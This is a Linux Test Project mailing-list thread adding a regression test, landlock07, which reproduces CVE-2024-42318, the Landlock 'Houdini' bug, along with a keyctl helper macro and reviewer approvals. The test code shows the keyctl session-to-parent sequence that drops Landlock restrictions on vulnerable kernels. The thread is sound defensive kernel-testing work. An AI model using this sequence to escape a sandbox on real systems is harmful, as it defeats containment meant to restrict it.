* [LTP] [PATCH v3 0/2] Reproducer for the landlock houdini bug
@ 2024-08-21 13:49 Andrea Cervesato
2024-08-21 13:49 ` [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro Andrea Cervesato
2024-08-21 13:49 ` [LTP] [PATCH v3 2/2] Add landlock07 test Andrea Cervesato
0 siblings, 2 replies; 6+ messages in thread
From: Andrea Cervesato @ 2024-08-21 13:49 UTC (permalink / raw)
To: ltp
More information at:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318
Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
Changes in v3:
- verify return value of keyctl() according with manual
- Link to v2: https://lore.kernel.org/r/20240821-landlock_houdini-v2-0-b46211ca64f9@suse.com
Changes in v2:
- add SAFE_KEYCTL macro
- verify in setup that landlock is activated
- Link to v1: https://lore.kernel.org/r/20240820-landlock_houdini-v1-1-ff3bffc93eaa@suse.com
---
Andrea Cervesato (2):
Add SAFE_KEYCTL macro
Add landlock07 test
include/lapi/keyctl.h | 49 +++++++++++
runtest/syscalls | 1 +
testcases/kernel/syscalls/landlock/.gitignore | 1 +
testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++
4 files changed, 160 insertions(+)
---
base-commit: edc79222abdcf32a344c806275a30a5c7cbf1ef3
change-id: 20240820-landlock_houdini-f244f52e87c3
Best regards,
--
Andrea Cervesato <andrea.cervesato@suse.com>
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 6+ messages in thread* [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro 2024-08-21 13:49 [LTP] [PATCH v3 0/2] Reproducer for the landlock houdini bug Andrea Cervesato @ 2024-08-21 13:49 ` Andrea Cervesato 2024-08-21 15:00 ` Cyril Hrubis 2024-08-21 13:49 ` [LTP] [PATCH v3 2/2] Add landlock07 test Andrea Cervesato 1 sibling, 1 reply; 6+ messages in thread From: Andrea Cervesato @ 2024-08-21 13:49 UTC (permalink / raw) To: ltp From: Andrea Cervesato <andrea.cervesato@suse.com> Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- include/lapi/keyctl.h | 49 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) diff --git a/include/lapi/keyctl.h b/include/lapi/keyctl.h index 3be782494..ff0a2ed22 100644 --- a/include/lapi/keyctl.h +++ b/include/lapi/keyctl.h @@ -179,4 +179,53 @@ static inline key_serial_t keyctl_join_session_keyring(const char *name) { # define KEY_OTH_ALL 0x0000003f #endif /* !KEY_POS_VIEW */ +static inline long safe_keyctl(const char *file, const int lineno, + int cmd, unsigned long arg2, unsigned long arg3, + unsigned long arg4, unsigned long arg5) +{ + long rval; + int failure = 0; + + rval = keyctl(cmd, arg2, arg3, arg4, arg5); + if (rval == -1) { + tst_brk_(file, lineno, TBROK | TERRNO, + "keyctl(%d, %lu, %lu, %lu, %lu)", + cmd, arg2, arg3, arg4, arg5); + } + + switch (cmd) { + case KEYCTL_GET_KEYRING_ID: + case KEYCTL_JOIN_SESSION_KEYRING: + case KEYCTL_DESCRIBE: + case KEYCTL_SEARCH: + case KEYCTL_READ: + case KEYCTL_SET_REQKEY_KEYRING: + case KEYCTL_GET_SECURITY: + case KEYCTL_GET_PERSISTENT: + case KEYCTL_DH_COMPUTE: + if (rval < 0) + failure = 1; + break; + case KEYCTL_ASSUME_AUTHORITY: + if ((!arg2 && rval) || (arg2 && rval < 0)) + failure = 1; + break; + default: + if (rval) + failure = 1; + break; + } + + if (failure) { + tst_brk_(file, lineno, TBROK, + "keyctl(%d, %lu, %lu, %lu, %lu) returned %ld", + cmd, arg2, arg3, arg4, arg5, rval); + } + + return rval; +} +#define SAFE_KEYCTL(cmd, arg2, arg3, arg4, arg5) \ + safe_keyctl(__FILE__, __LINE__, \ + (cmd), (arg2), (arg3), (arg4), (arg5)) + #endif /* LAPI_KEYCTL_H__ */ -- 2.43.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 6+ messages in thread
* Re: [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro 2024-08-21 13:49 ` [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro Andrea Cervesato @ 2024-08-21 15:00 ` Cyril Hrubis 0 siblings, 0 replies; 6+ messages in thread From: Cyril Hrubis @ 2024-08-21 15:00 UTC (permalink / raw) To: Andrea Cervesato; +Cc: ltp Hi! Looks good to me now: Reviewed-by: Cyril Hrubis <chrubis@suse.cz> -- Cyril Hrubis chrubis@suse.cz -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 6+ messages in thread
* [LTP] [PATCH v3 2/2] Add landlock07 test 2024-08-21 13:49 [LTP] [PATCH v3 0/2] Reproducer for the landlock houdini bug Andrea Cervesato 2024-08-21 13:49 ` [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro Andrea Cervesato @ 2024-08-21 13:49 ` Andrea Cervesato 2024-08-21 15:05 ` Cyril Hrubis 1 sibling, 1 reply; 6+ messages in thread From: Andrea Cervesato @ 2024-08-21 13:49 UTC (permalink / raw) To: ltp From: Andrea Cervesato <andrea.cervesato@suse.com> This test is a reproducer for the CVE-2024-42318 bug, also known as landlock Houdini. More information at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318 Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- runtest/syscalls | 1 + testcases/kernel/syscalls/landlock/.gitignore | 1 + testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++ 3 files changed, 111 insertions(+) diff --git a/runtest/syscalls b/runtest/syscalls index fea0c9828..a9fc8c432 100644 --- a/runtest/syscalls +++ b/runtest/syscalls @@ -706,6 +706,7 @@ landlock03 landlock03 landlock04 landlock04 landlock05 landlock05 landlock06 landlock06 +landlock07 landlock07 lchown01 lchown01 lchown01_16 lchown01_16 diff --git a/testcases/kernel/syscalls/landlock/.gitignore b/testcases/kernel/syscalls/landlock/.gitignore index 315ac1dca..db11bff2f 100644 --- a/testcases/kernel/syscalls/landlock/.gitignore +++ b/testcases/kernel/syscalls/landlock/.gitignore @@ -5,3 +5,4 @@ landlock03 landlock04 landlock05 landlock06 +landlock07 diff --git a/testcases/kernel/syscalls/landlock/landlock07.c b/testcases/kernel/syscalls/landlock/landlock07.c new file mode 100644 index 000000000..68045da3b --- /dev/null +++ b/testcases/kernel/syscalls/landlock/landlock07.c @@ -0,0 +1,109 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (C) 2024 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com> + */ + +/** + * [Description] + * + * CVE-2024-42318 + * + * Test to check if sysem is affected by Landlock Houdini bug: + * https://www.suse.com/security/cve/CVE-2024-42318.html + * + * Kernel bug fixed in: + * + * commit 39705a6c29f8a2b93cf5b99528a55366c50014d1 + * Author: Jann Horn <jannh@google.com> + * Date: Wed Jul 24 14:49:01 2024 +0200 + * + * landlock: Don't lose track of restrictions on cred_transfer + */ + +#include "tst_test.h" +#include "lapi/prctl.h" +#include "lapi/keyctl.h" +#include "tst_test_macros.h" +#include "landlock_common.h" + +static struct landlock_ruleset_attr *ruleset_attr; +static int ruleset_fd; + +static pid_t spawn_houdini(void) +{ + pid_t pid; + + SAFE_KEYCTL(KEYCTL_JOIN_SESSION_KEYRING, 0, 0, 0, 0); + + pid = SAFE_FORK(); + if (!pid) { + SAFE_KEYCTL(KEYCTL_JOIN_SESSION_KEYRING, 0, 0, 0, 0); + SAFE_KEYCTL(KEYCTL_SESSION_TO_PARENT, 0, 0, 0, 0); + exit(0); + } + + return pid; +} + +static void run(void) +{ + pid_t pid_houdini; + + if (SAFE_FORK()) + return; + + SAFE_PRCTL(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); + SAFE_LANDLOCK_RESTRICT_SELF(ruleset_fd, 0); + + TST_EXP_FAIL(open("/dev/null", O_WRONLY), EACCES); + if (TST_RET != -1) { + SAFE_CLOSE(TST_RET); + return; + } + + pid_houdini = spawn_houdini(); + SAFE_WAITPID(pid_houdini, NULL, 0); + + TST_EXP_FAIL(open("/dev/null", O_WRONLY), EACCES); + if (TST_RET != -1) + SAFE_CLOSE(TST_RET); + + exit(0); +} + +static void setup(void) +{ + verify_landlock_is_enabled(); + + ruleset_attr->handled_access_fs = LANDLOCK_ACCESS_FS_WRITE_FILE; + ruleset_fd = SAFE_LANDLOCK_CREATE_RULESET( + ruleset_attr, + sizeof(struct landlock_ruleset_attr), + 0); +} + +static void cleanup(void) +{ + if (ruleset_fd != -1) + SAFE_CLOSE(ruleset_fd); +} + +static struct tst_test test = { + .test_all = run, + .setup = setup, + .cleanup = cleanup, + .forks_child = 1, + .bufs = (struct tst_buffers []) { + {&ruleset_attr, .size = sizeof(struct landlock_ruleset_attr)}, + {}, + }, + .caps = (struct tst_cap []) { + TST_CAP(TST_CAP_REQ, CAP_SYS_ADMIN), + {} + }, + .tags = (const struct tst_tag[]) { + {"linux-git", "39705a6c29f8"}, + {"CVE", "2024-42318"}, + {} + } +}; -- 2.43.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 6+ messages in thread
* Re: [LTP] [PATCH v3 2/2] Add landlock07 test 2024-08-21 13:49 ` [LTP] [PATCH v3 2/2] Add landlock07 test Andrea Cervesato @ 2024-08-21 15:05 ` Cyril Hrubis 2024-08-21 17:34 ` Andrea Cervesato via ltp 0 siblings, 1 reply; 6+ messages in thread From: Cyril Hrubis @ 2024-08-21 15:05 UTC (permalink / raw) To: Andrea Cervesato; +Cc: ltp Hi! > More information at: > https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318 > > Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> > --- > runtest/syscalls | 1 + > testcases/kernel/syscalls/landlock/.gitignore | 1 + > testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++ > 3 files changed, 111 insertions(+) > > diff --git a/runtest/syscalls b/runtest/syscalls > index fea0c9828..a9fc8c432 100644 > --- a/runtest/syscalls > +++ b/runtest/syscalls > @@ -706,6 +706,7 @@ landlock03 landlock03 > landlock04 landlock04 > landlock05 landlock05 > landlock06 landlock06 > +landlock07 landlock07 > > lchown01 lchown01 > lchown01_16 lchown01_16 > diff --git a/testcases/kernel/syscalls/landlock/.gitignore b/testcases/kernel/syscalls/landlock/.gitignore > index 315ac1dca..db11bff2f 100644 > --- a/testcases/kernel/syscalls/landlock/.gitignore > +++ b/testcases/kernel/syscalls/landlock/.gitignore > @@ -5,3 +5,4 @@ landlock03 > landlock04 > landlock05 > landlock06 > +landlock07 > diff --git a/testcases/kernel/syscalls/landlock/landlock07.c b/testcases/kernel/syscalls/landlock/landlock07.c > new file mode 100644 > index 000000000..68045da3b > --- /dev/null > +++ b/testcases/kernel/syscalls/landlock/landlock07.c > @@ -0,0 +1,109 @@ > +// SPDX-License-Identifier: GPL-2.0-or-later > +/* > + * Copyright (C) 2024 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com> > + */ > + > +/** > + * [Description] > + * > + * CVE-2024-42318 > + * > + * Test to check if sysem is affected by Landlock Houdini bug: ^ t Otherwise: Reviewed-by: Cyril Hrubis <chrubis@suse.cz> -- Cyril Hrubis chrubis@suse.cz -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: [LTP] [PATCH v3 2/2] Add landlock07 test 2024-08-21 15:05 ` Cyril Hrubis @ 2024-08-21 17:34 ` Andrea Cervesato via ltp 0 siblings, 0 replies; 6+ messages in thread From: Andrea Cervesato via ltp @ 2024-08-21 17:34 UTC (permalink / raw) To: Cyril Hrubis, Andrea Cervesato; +Cc: ltp Hi! I fix the typo and push the patch to upstream. Thanks, Andrea On 8/21/24 17:05, Cyril Hrubis wrote: > Hi! >> More information at: >> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318 >> >> Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> >> --- >> runtest/syscalls | 1 + >> testcases/kernel/syscalls/landlock/.gitignore | 1 + >> testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++ >> 3 files changed, 111 insertions(+) >> >> diff --git a/runtest/syscalls b/runtest/syscalls >> index fea0c9828..a9fc8c432 100644 >> --- a/runtest/syscalls >> +++ b/runtest/syscalls >> @@ -706,6 +706,7 @@ landlock03 landlock03 >> landlock04 landlock04 >> landlock05 landlock05 >> landlock06 landlock06 >> +landlock07 landlock07 >> >> lchown01 lchown01 >> lchown01_16 lchown01_16 >> diff --git a/testcases/kernel/syscalls/landlock/.gitignore b/testcases/kernel/syscalls/landlock/.gitignore >> index 315ac1dca..db11bff2f 100644 >> --- a/testcases/kernel/syscalls/landlock/.gitignore >> +++ b/testcases/kernel/syscalls/landlock/.gitignore >> @@ -5,3 +5,4 @@ landlock03 >> landlock04 >> landlock05 >> landlock06 >> +landlock07 >> diff --git a/testcases/kernel/syscalls/landlock/landlock07.c b/testcases/kernel/syscalls/landlock/landlock07.c >> new file mode 100644 >> index 000000000..68045da3b >> --- /dev/null >> +++ b/testcases/kernel/syscalls/landlock/landlock07.c >> @@ -0,0 +1,109 @@ >> +// SPDX-License-Identifier: GPL-2.0-or-later >> +/* >> + * Copyright (C) 2024 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com> >> + */ >> + >> +/** >> + * [Description] >> + * >> + * CVE-2024-42318 >> + * >> + * Test to check if sysem is affected by Landlock Houdini bug: > ^ > t > > > Otherwise: > > Reviewed-by: Cyril Hrubis <chrubis@suse.cz> > -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 6+ messages in thread
end of thread, other threads:[~2024-08-21 17:34 UTC | newest] Thread overview: 6+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2024-08-21 13:49 [LTP] [PATCH v3 0/2] Reproducer for the landlock houdini bug Andrea Cervesato 2024-08-21 13:49 ` [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro Andrea Cervesato 2024-08-21 15:00 ` Cyril Hrubis 2024-08-21 13:49 ` [LTP] [PATCH v3 2/2] Add landlock07 test Andrea Cervesato 2024-08-21 15:05 ` Cyril Hrubis 2024-08-21 17:34 ` Andrea Cervesato via ltp
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox